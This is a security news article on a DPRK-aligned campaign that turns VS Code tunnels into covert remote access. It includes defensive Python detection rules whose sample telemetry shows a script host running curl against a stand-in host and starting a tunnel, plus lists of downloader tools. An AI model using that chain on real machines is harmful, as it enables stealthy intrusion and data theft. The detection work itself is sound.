North Korea-Linked Attackers Abuse Microsoft Dev Tools Tunnels for Covert Access

Darktrace warns that Microsoft developer tools are being repurposed to avoid detection and maintain stealthy remote access.

Published on Jan 22, 2026

Cybersecurity researchers have uncovered a cyber-espionage campaign assessed to align with activity commonly associated with the Democratic People’s Republic of Korea (DPRK), targeting users in South Korea through carefully crafted spear-phishing emails.

The operation uses JScript Encoded (.jse) scripts and realistic government-themed decoy documents to establish persistent remote access through Microsoft Visual Studio (VS) Code tunnels, rather than through a custom implant.

According to Darktrace analysts, the initial lure is a script masquerading as a Hangul Word Processor (HWPX) document referencing a South Korean civil service graduate program. The decoy impersonates the Ministry of Personnel Management, a legitimate government body, and its metadata suggests it was copied from official sources and subtly altered to appear authentic.

When the file is opened, the .jse script runs under Windows Script Host and starts a chain of activity that avoids traditional malware deployment. Instead of installing a custom backdoor, the script downloads legitimate Microsoft VS Code components and command-line utilities from Microsoft's own infrastructure, so the download traffic looks like ordinary software delivery and is less likely to trigger alerts.

Abuse of Trusted Developer Features

From a technical standpoint, Microsoft VS Code tunnels (the `code tunnel` command of the VS Code CLI) are designed to let developers reach a remote machine over an encrypted channel after authenticating with a GitHub or Microsoft account; the tunnel host makes an outbound connection to Microsoft's tunnel service, so no inbound firewall rule is needed.

In this campaign, the attackers start a tunnel in the background on the victim machine. The CLI emits a device authorization code; whoever completes that device login binds the tunnel to their account, so the attacker, not the victim, becomes the authorized user of the compromised endpoint and can reach it from any VS Code client or from vscode.dev.

Once the tunnel is authorized, the threat actor gains interactive control through VS Code’s built-in terminal and file browser. This enables data exfiltration and delivery of additional payloads while blending into normal developer activity.

Darktrace observed that tunnel identifiers and authorization details were relayed through a compromised South Korean website used as part of the attackers’ command-and-control infrastructure.
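The chain described above leaves a recognizable shape in endpoint telemetry even though every binary involved is signed by Microsoft. As an added example (not Darktrace's or Microsoft's code), the following Python applies three detection rules to simplified Sysmon-style process-creation and DNS events and correlates them per host: a Windows Script Host process spawning a downloader or the VS Code CLI, the CLI started in tunnel mode, and DNS lookups for the tunnel service. The tunnel domain list is taken from Microsoft's Remote Tunnels documentation and is an assumption to verify against your own egress baseline; the event records and host names are constructed for illustration.

```python
"""Detection logic for the VS Code tunnel abuse chain (added example).

Event shapes are a simplified Sysmon-like model (process creation and DNS
query records); the sample events at the bottom are constructed, not captures.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Tunnel service endpoints as listed in Microsoft's Remote Tunnels docs
# (assumption: confirm against your own network baseline before alerting).
TUNNEL_DOMAINS = ("devtunnels.ms", "tunnels.api.visualstudio.com", "vscode.dev")

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # Windows Script Host runs .jse
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe"}
VSCODE_BINARIES = {"code.exe", "code-tunnel.exe", "code-insiders.exe"}
# "tunnel" as a standalone argument, not part of "--tunnel-something".
TUNNEL_ARG = re.compile(r"(?:^|\s)tunnel(?:\s|$)", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def basename(path: str) -> str:
    """Lower-case file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_process(ev: dict) -> list[Finding]:
    """Rules over one process-creation event: host, image, parent_image, cmdline."""
    image = basename(ev["image"])
    parent = basename(ev.get("parent_image", ""))
    cmdline = ev.get("cmdline", "")
    out = []
    # Rule 1: the VS Code CLI started in tunnel mode.
    if image in VSCODE_BINARIES and TUNNEL_ARG.search(cmdline):
        out.append(Finding(ev["host"], "vscode_tunnel_start", cmdline))
    # Rule 2: a script host (the .jse stage) launching a downloader or the CLI.
    if parent in SCRIPT_HOSTS and (image in DOWNLOADERS or image in VSCODE_BINARIES):
        out.append(Finding(ev["host"], "wsh_child_download_or_vscode", f"{parent} -> {image}"))
    return out


def check_dns(ev: dict) -> list[Finding]:
    """Rule 3: a DNS lookup for a tunnel service domain (fields: host, query)."""
    q = ev["query"].lower().rstrip(".")
    for d in TUNNEL_DOMAINS:
        if q == d or q.endswith("." + d):
            return [Finding(ev["host"], "tunnel_service_dns", q)]
    return []


def triage(process_events, dns_events, developer_hosts=frozenset()) -> dict[str, str]:
    """Severity per host: 'high' when the script-host chain and a tunnel indicator
    co-occur, 'medium' for tunnel indicators on a non-developer host, 'low' for
    the same indicators on an allow-listed developer host or for the chain alone."""
    by_host = defaultdict(set)
    for ev in process_events:
        for f in check_process(ev):
            by_host[f.host].add(f.rule)
    for ev in dns_events:
        for f in check_dns(ev):
            by_host[f.host].add(f.rule)
    verdict = {}
    for host, rules in by_host.items():
        tunnel = rules & {"vscode_tunnel_start", "tunnel_service_dns"}
        if "wsh_child_download_or_vscode" in rules and tunnel:
            verdict[host] = "high"
        elif tunnel:
            verdict[host] = "low" if host in developer_hosts else "medium"
        else:
            verdict[host] = "low"  # WSH spawning a downloader alone: review, no tunnel yet
    return verdict


# Constructed sample telemetry (host names, paths and URL are made up).
SAMPLE_PROCESS = [
    {"host": "FIN-PC-07", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o C:\\Users\\Public\\code.exe https://example.invalid/cli.zip"},
    {"host": "FIN-PC-07", "parent_image": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\Public\code.exe",
     "cmdline": "code.exe tunnel --accept-server-license-terms --name fin-pc-07"},
    {"host": "DEV-WS-12", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft VS Code\bin\code-tunnel.exe",
     "cmdline": "code-tunnel.exe tunnel"},
    {"host": "HR-PC-03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "cmdline": "Code.exe C:\\Users\\hr\\notes.txt"},
]
SAMPLE_DNS = [
    {"host": "FIN-PC-07", "query": "global.rel.tunnels.api.visualstudio.com"},
    {"host": "DEV-WS-12", "query": "global.rel.tunnels.api.visualstudio.com"},
    {"host": "HR-PC-03", "query": "update.code.visualstudio.com"},
]

if __name__ == "__main__":
    for host, sev in sorted(triage(SAMPLE_PROCESS, SAMPLE_DNS, {"DEV-WS-12"}).items()):
        print(f"{host}: {sev}")
```

At the network layer a compromised host and a legitimate developer's tunnel look the same, which is why the allow-list of developer hosts does the separating work here; the process ancestry (script host to CLI) is the signal that does not depend on knowing who is allowed to tunnel. The device code itself is written to the CLI's console output, not to process-creation events, so the identity that authorized the tunnel is only available from the identity provider's sign-in logs.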

The company noted that similar misuse of Microsoft VS Code tunnels has been observed since 2023 in campaigns attributed to other state-aligned threat groups targeting government and critical digital infrastructure.

“While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor,” Darktrace wrote.

For security leaders, the research underscores the need for behavioral monitoring of process ancestry and outbound connections, and for tighter governance over trusted administrative and developer tools that, once signed in to an attacker-controlled account, provide long-term remote access without any custom malware.